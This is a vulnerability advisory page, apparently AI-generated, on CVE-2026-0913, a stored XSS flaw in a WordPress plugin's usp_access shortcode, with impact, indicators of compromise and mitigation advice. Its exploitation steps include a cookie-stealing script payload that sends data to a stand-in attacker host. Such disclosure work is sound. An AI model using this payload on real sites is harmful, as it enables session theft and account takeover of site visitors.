CVE-2026-0913: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2026-0913 is a Stored Cross-Site Scripting (XSS) vulnerability in the "User Submitted Posts – Enable Users to Submit Posts from the Front End" plugin for WordPress. The flaw exists in all versions up to and including version 20260110, stemming from insufficient input sanitization and output escaping on user-supplied attributes within the plugin's usp_access shortcode. It was published on January 16, 2026, with the CVE record received from Wordfence. The vulnerability carries a CVSS v3.1 base score of 6.4 (Medium), assigned by Wordfence (Wordfence, NVD).

Technical details

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation – Cross-site Scripting). The vulnerability is located in the plugin's shortcode-access.php file (specifically around line 20), where user-supplied attributes passed to the usp_access shortcode are not properly sanitized before being rendered in the page output. An authenticated attacker with at least Contributor-level access can embed a malicious shortcode containing arbitrary JavaScript into a WordPress post or page; the script executes in the browser of any user who subsequently visits the affected page. The attack vector is network-based, requires low privileges, and no user interaction beyond the victim visiting the injected page (Wordfence, WordPress Trac).

Impact

Successful exploitation allows an attacker to inject and persistently store malicious JavaScript that executes in the context of any user's browser when they visit an affected page, impacting both confidentiality and integrity (CVSS scope: Changed). Potential consequences include session cookie theft, credential harvesting, defacement of page content, redirection to malicious sites, or further attacks against authenticated administrators — which could escalate to full site compromise. Availability is not directly impacted by this vulnerability (Wordfence, NVD).

Exploitability

No public proof-of-concept exploit code or evidence of active in-the-wild exploitation has been reported for CVE-2026-0913. The EPSS score is approximately 0.029% (0.000290), indicating a very low probability of exploitation in the near term. The vulnerability requires authenticated access at the Contributor level or above, which limits the attack surface compared to unauthenticated vulnerabilities. It is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, Feedly).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the "User Submitted Posts" plugin at version 20260110 or earlier. This can be done by checking the plugin's readme.txt or changelog exposed at /wp-content/plugins/user-submitted-posts/readme.txt.
  2. Obtain Contributor access: Register or compromise an account with at least Contributor-level privileges on the target WordPress site.
  3. Craft malicious shortcode: Create a new post or page and insert the usp_access shortcode with a malicious attribute containing a JavaScript payload, for example: [usp_access attribute=""><script>document.location='https://attacker.com/steal?c='+document.cookie</script>"].
  4. Submit the post: Save or submit the post/page. Because the plugin does not sanitize the shortcode attribute, the raw script is stored in the database.
  5. Trigger execution: When any user (including administrators) visits the page containing the injected shortcode, the malicious JavaScript executes in their browser, potentially stealing session cookies or performing actions on their behalf (Wordfence, WordPress Trac).

Indicators of compromise

  • Logs: WordPress access logs showing authenticated POST requests to wp-admin/post.php or the REST API containing usp_access shortcode with unusual attribute values including HTML tags or JavaScript.
  • Database: WordPress wp_posts table entries containing [usp_access shortcode with embedded <script> tags, event handlers (e.g., onerror, onload), or encoded JavaScript payloads in post content.
  • Network: Outbound requests from victim browsers to unknown external domains shortly after visiting pages containing the usp_access shortcode, potentially carrying cookie or session data in query parameters.
  • File System: Review of shortcode-access.php in the plugin directory for the unpatched version (tags/20251210) versus the patched changeset (WordPress Trac).

Mitigation and workarounds

Site administrators should update the "User Submitted Posts" plugin to a version released after January 10, 2026 (version 20260110 is the last vulnerable version); the fix is available in the changeset at the WordPress plugin repository. The patch addresses the insufficient sanitization of the usp_access shortcode attributes. As a temporary workaround, administrators can restrict Contributor-level users from creating or editing posts, or disable the usp_access shortcode functionality until the plugin is updated (WordPress Trac, Wordfence).

Community reactions

Wordfence reported this vulnerability as part of their weekly WordPress vulnerability report covering January 12–18, 2026, and assigned the CVE through their coordinated disclosure process. The vulnerability received standard coverage from automated vulnerability tracking services (VulDB, CVEFeed, Vulners) and Spanish national cybersecurity agencies (INCIBE, CCN-CERT). No notable independent researcher commentary or significant social media discussion beyond automated CVE tracking posts has been identified (Wordfence Blog).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management